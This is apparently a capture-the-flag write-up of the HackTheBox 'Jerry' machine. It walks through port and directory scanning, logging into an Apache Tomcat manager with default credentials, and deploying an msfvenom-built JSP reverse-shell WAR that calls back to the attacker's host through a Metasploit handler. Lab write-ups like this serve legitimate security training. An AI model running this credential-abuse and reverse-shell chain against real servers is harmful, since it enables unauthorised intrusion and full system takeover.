HackTheBox Jerry Writeup

Enjoy reading my HTB Jerry Writeup

Information Gathering

Let's start with a nmap scan to gain some knowledge about the running services on the HTB Jerry machine.

sudo nmap -p- -T4 -sC -sV -O -v 10.10.10.95

The running operating system seems to be a Windows Server 2012 with apache tomcat/coyote running on port 8080.

Browsing the site we see the default page of Apache Tomcat/7.0.88. Let's keep that version in mind as we might have to search for matching exploits but first I will enumerate for directories and files.

gobuster dir -u http://10.10.10.95:8080/ -x php -w /Lists/directory-small.txt

Gobuster found three directories:

/docs
/examples
/manager

But they all seem to be part of the default page and the /manager directory needs valid login credentials we do not have.

By clicking on "cancel" we get redirected to the 401 Unauthorized page that tells us how to set up a user and the default/example credentials: tomcat:s3cret.

Once again, the web admin was pretty lazy as these credentials are actually working.

Gaining a reverse shell

After logging into the manager panel we can deploy a WAR file. Luckily, msfvenom can create payloads in the WAR format using the following command:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.180 LPORT=4545 -f war > shell.war

which we then can upload using the deploy function on the website.

Next, fire up metasploit and select the handler: using exploit/multi/handler, then adjust the LHOST, LPORT, and the payload used.

After this is all set up, browse the website: http://10.10.10.95:8080/shell/ and we will get a reverse shell session in msf.

As we already have nt authority/system permissions we navigate straight to C:\Users\Administrator\Desktop\flags without further privilege escalation.

Use type "2 for the price of 1.txt" to display both, the user and the root flag.

Tags:

HTB, hackthebox, jerry, windows, apache, tomcat